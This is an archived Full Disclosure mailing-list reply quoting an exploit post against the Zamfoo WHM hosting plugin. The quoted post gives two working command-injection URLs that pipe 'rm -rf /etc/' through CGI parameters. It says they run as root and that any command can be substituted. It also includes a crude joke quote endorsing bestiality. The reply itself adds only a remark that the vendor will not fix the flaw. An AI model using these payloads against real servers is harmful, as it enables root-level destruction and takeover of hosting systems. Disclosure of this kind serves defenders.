[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [FD] Zamfoo Multiple Arbitrary Command Executions
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: Re: [FD] Zamfoo Multiple Arbitrary Command Executions
- From: nkukard+fulldisclosure@xxxxxxxx
- Date: Sat, 03 May 2014 13:09:07 +0000
On 05/02/2014 11:57 PM, Mad Hax wrote:
# Title: Zamfoo Multiple Arbitrary Command Executions
# Author: Al-Shabaab
# Vendor Homepage:http://www.zamfoo.com/
# Version: 12.6
# Intro
The ZamFoo software suite is a series of WHM plugin modules (also known as WHM
addon modules) catered towards easing the burden of web hosting providers that
sell shared hosting solutions using the Cpanel and WHM hosting platform.
# Exploit Número Uno
https://whm:2087/cpsessXXXXXXXXXX/cgi/zamfoo/zamfoo_do_restore_zamfoo_backup.cgi?accounttorestore=|rm
-rf /etc/${IFS}
# Exploit Número Dos
https://whm:2087/cpsessXXXXXXXXXX/cgi/zamfoo/zamfoo_do_change_site_ip.cgi?accounttochange=|rm
-rf /etc/|&newip=127.0.0.1&pattern2=
Both of these exploitz will wipe out the /etc/ dir. Replace command with
anything. It all runz as root!
# Greetz
Moktar Zubeyr. Hassan Aweys. Hassan Afrah. HoodedCoder.
# Quote from #Al-Shabaab
<hoodedcoder> Having sex with animals should be legal. I know my cat loves me
and I love him; I ask where is the harm? If it wasn't consensual he would claw me and
try to get away!
And the author(s) of it refuse to do anything about it (or don't posses
the skills to) ...
http://www.webhostingtalk.com/showthread.php?t=1275572
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/